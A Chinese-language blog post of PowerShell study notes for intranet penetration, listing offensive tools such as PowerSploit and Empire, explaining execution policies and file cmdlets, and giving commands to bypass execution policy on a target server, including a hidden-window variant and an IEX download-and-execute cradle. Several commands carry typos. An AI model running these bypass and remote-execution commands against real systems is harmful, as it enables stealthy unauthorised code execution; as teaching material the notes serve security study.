powershell学习笔记

最新推荐文章于 2024-06-21 09:20:02 发布
最新推荐文章于 2024-06-21 09:20:02 发布
阅读量440 收藏 3
点赞数
分类专栏: 内网
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43152809/article/details/112062224
版权

常见的powershell攻击工具

  • PowerSploit:被广泛使用的powershell后期漏洞利用框架,常用于信息探测、特权提升、凭证窃取、持久化等操作
  • Nishang:集成了框架、脚本和各种payload,包含下载和执行、键盘记录、DNS、延时命令等脚本
  • Empire:基于powershell的远程控制木马,可以从凭证数据库中导出和跟踪凭证信息,常用于提供前期漏洞利用的集成模块、信息探测、凭据窃取以及持久化攻击
  • PowerCat:powershell版的NetCat,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,可以在脚本中以多种方式使用它

powershell基本概念

为防止恶意脚本的执行,powershell有一个执行策略,默认情况下,这个执行策略被设为受限
在powershell命令无法执行时,可以使用cmdlet命令确定当前的执行策略

  • Get-ExecutionPolicy
  • Restricted:脚本不能运行(默认设置)
  • RemoteSigned:本地创建的脚本可以运行,但从网上下载的脚本不能运行(拥有数字证明签名的除外)
  • AllSigned:仅当脚本由受信任的发布者签名时才能运行
  • Unrestricted:允许所有的script运行
    还可以使用下面的cmdlet命令设置powershell的执行策略
Set-ExecutionPolicy <policy name>

运行一个powershell脚本,必须键入完整的路径名和文件名
进入文件所在位置,在文件名前加.\即可执行

powershell常用命令

基本知识

类似“cmd命令”叫做“cmdlet”,其命名规范十分一致,都采用“动词-名词”形式,如New-Item,动词部分一般为Add,New,Get,Remote,Set等,命名的别名一般兼容Windows Command和Linux Shell,如Get-Childltem命令使用dir和ls均可,且powershell命令不区分大小写
下面以文件操作为例讲解powershell的基本语法:

新建目录:New-ltem whitecellclub-ltem Type Directory
新建文件:New-ltem light.txt-ltem Type File
删除目录:Remove-ltem whitecellclud
显示文本内容:Get-Content test.txt
设置文本内容:Set-Content test.txt -Value"hell,word!"
追加内容:Add-Content light.txt -Value "i love you"
清除内容:Clear-Content test.txt

常用命令

通过windows终端输入powershell命令进入powershell命令行
输入help即可显示帮助模块
在这里插入图片描述
运行powershell脚本程序,需要使用管理员权限将Restricted策略更改为Unrestricted,因此在渗透时,需要采用一些方法来绕过策略执行脚本

  • 绕过本地权限执行
    上传runme.ps1到目标服务器,在cmd环境中,在目标服务器本地执行此脚本
    runme.ps1的内容
Write-Host "My voice is my password,verify me."

命令如下:

powershell.exe -executionpolicy bypass -file runme.ps1

在这里插入图片描述

  • 本地隐藏绕过权限执行脚本
powershell.exe -executionpolicy bypass -windowstyle hidden -nologo -nonlnteractive -noprofile -file runme.ps1
  • 用IEX下载远程PS1脚本绕过执行权限
powershell.exe -executionpolicy bypass  -windowstyle hidden-noprofile-noni iex(new-objectnet.webclient).downloadstring("runme.ps1");[parametres]

命令参数说明:

  • executionpolicy bypass:绕过执行安全策略通过设置该参数,可以绕过任意一个安全保护规则
  • windowstyle hidden:隐藏窗口
  • nologo:启动不显式版权标志的powershell
  • nonlnteractive(-NonI):非交互模式,powershell不为用户提供交互的提示
  • noprofile:powershell控制台不加载当前用户的配置文件
  • noexit:执行后不退出shell

其余绕过策略方法
绕过powellshell执行策略的十五种方法

aur03a
关注
专栏目录
powershell知识点实战积累
刘同学的博客
11-19 424
1. 使用SSH密钥连接Git仓库 请参考:SSH密钥连接Git仓库方法
PowerShell常用命令及使用方法
热门推荐
Captain_RB的博客
06-17 5万+
PowerShell 依托.NET Framework平台可以实现非常强大的功能,而且普适性强,Win7及以上系统自带,隐蔽性好,可以直接在内存中运行,能够绕过部分杀软,现将平日操作及内网渗透过程中常用命令及使用方法总结如下。...
PowerShell-学习笔记
luckykuku
08-18 476
Windows PowerShell Cmdlet  cmdlet  (读作“command-let”)是 Windows PowerShell 中用于操作对象的单功能命令。 可以通过其名称格式识别 cmdlet --  由短划线 (-) 分隔的动词和名词,如 Get-Help、Get-P rocess 和 Start-Service。
powershell.exe -NoProfile -InputFormat none -ExecutionPolicy unrestricted
m0_37847641的博客
07-04 1474
报错F:\apache-flume-1.7.0-bin\bin&gt;powershell.exe -NoProfile -InputFormat none -ExecutionPolicy unrestricted -File F:\apache-flume-1.7.0-bin\bin\flume-ng.ps1 agent -conf ../conf  -conf-file ../conf/ex...
PowerShell 的命令行启动参数(可用于执行命令、传参或进行环境配置)
walterlv - 吕毅
06-29 1万+
有一些程序不支持被直接启动,而要求通过命令行启动。这个时候,你就需要使用 PowerShell 或者 PowerShell Core 来启动这样的程序。我们都知道如何在命令行或各种终端中启动一个程序,但是当你需要自动启动这个程序的时候,你就需要知道如何通过 PowerShell 或其他命令行终端来启动一个程序,而不是手工输入然后回车运行了。 本文就介绍 PowerShell 的命令行启动参数。利用...
Powershell学习笔记--使用正则表达式查找文件
10-25
PowerShell是一种强大的脚本语言,广泛用于Windows系统的管理和自动化任务。它提供了丰富的命令和函数,其中包括使用正则表达式进行字符串匹配和文件查找的功能。正则表达式是一种定义搜索模式的文本模式,能够对...
Windows PowerShell学习笔记(一)
TurborX的博客
06-20 774
powershell概述 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NETFramework的强大功能。它引入了许多非常有用的新概念,从而进一步扩展了在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。 powershell是一个shell,定义好了一些命令操作系统,特别是与文件系统交互,能够启动应用程序,甚至操纵应用程序。PowerShell还能允许将几个命令组合起来放到文件里执行,实现文件
PowerShell 学习笔记 - 1 PS Core 基础
cyw0ng
09-16 3215
PowerShell 学习笔记 - 1 PS Core 基础 本章主要探讨 PowerShell 核心,主要基于 Linux 平台上的 PowerShell Core 实现,实际上于 Windows PowerShell 平台上进行的实验获得的结果也不会有太大区别: # 运行容器 C:\Users\chuny&gt;docker run -it --name ps-test-base mc...
PowerShell学习笔记(1)-基础
corfox_liu的专栏
09-28 1931
PowerShell学习笔记(1):基础  前段时间在知乎上得知Windows下的一款强大的命令行工具PowerShell(原谅我刚刚得知)。 其强大的功能,令人惊叹,兴趣盎然,这么优秀的工具值得我去学习、了解, 虽然我并不是程序猿。我的测试练习环境:win7 PowerShell v1.0基础内容命令的概念与术语  基本命令形式如下: command -parameter1 -parameter
【内网学习笔记】2、PowerShell
TeamsSix 的 CSDN 空间
02-06 1155
1、介绍 PowerShell 可以简单的理解为 cmd 的高级版,cmd 能做的事在 PowerShell 中都能做,但 PowerShell 还能做很多 cmd 不能做的事情。 PowerShell 内置在 Windows 7、Windows Server 2008 R2 及更高版本的 Windows 系统中,同时 PowerShell 是构建在 .NET 平台上的,所有命令传递的都是 .NET 对象。 PowerShell 有如下特点: Windows 7 以上的操作系统默认安装 PowerShel
pip安装ipython大片红字报错解决办法
qq_43406822的博客
07-22 5041
pip安装ipython大片红字报错解决办法 此处使用的是win10,不过理论上有cmd应该都可以(大概) 为了避免更多的问题发生,请务必使用WindowsPowerShell(管理员)模式运行 下面是问题描述和解决方法: 安装ipython时发现出现大片红字,如上图所示,最下方可能出现Warning的提示如下图所示 这里更新pip可以取消warning部分 代码如下 python -m pip install -U pip 不太清楚具体原理,不过这里我试过和提示中的一样使用–upgrade来升级pip
解决Win11的PowerShell下无法激活conda环境问题
dzw0120的博客
01-22 2836
解决Win11的PowerShell下无法激活conda环境问题
PowerShell提示无法加载profile文件
maxsgq的博客
07-09 1364
PowerShell提示 ”无法加载文件 WindowsPowerShell\profile.ps1
隐藏powershell启动时前面的提示信息
折腾--永不停息
09-22 4458
按Win+R输入wt启动Windows Terminal,如果打开的是powershell,前面会有一大串提示信息,这有影响我们的体验,其实可以将其隐藏起来的。 打开设置 点开powershell的配置文件,在命令行出修改为: powershell.exe -nologo 这时启动powershell,可以看到不显示提示信息了,瞬间干爽了很多 ...
什么是 PowerShell
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
10-17 5869
什么是 PowerShell
PowerShell 是什么?它的作用都有哪些?
最新发布
qq_57728300的博客
06-21 3264
本文总结了 PowerShell 的定义以及一些作用。
powellshell 一进去就报错
weixin_65031676的博客
12-22 440
②还有一个Invoke-Expression 的问题是 系统环境变量里有不可见字符 得放文本编辑器里比如wps里面才能看到 还有不能放一行用;①一个问题是conda初始化的问题 找到初始化文件然后找最原始的写法写就行。
Windows管理员必须掌握的25个PowerShell命令​
NewTyun的博客
03-17 4239
本文列出了最常用的PowerShell命令,以及有关何时使用它们的详细信息。尽管Windows PowerShell已经存在了一段时间,但仍有许多管理...
"Python学习笔记与命令行基础教程
学习笔记中主要涉及到Python编程,以及命令行入门的基本命令。在Windows Powershell中,常用的命令包括pwd用于打印工作目录,hostname用于显示计算机在网络中的名称,mkdir用于创建目录,cd用于切换目录,ls用于列出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值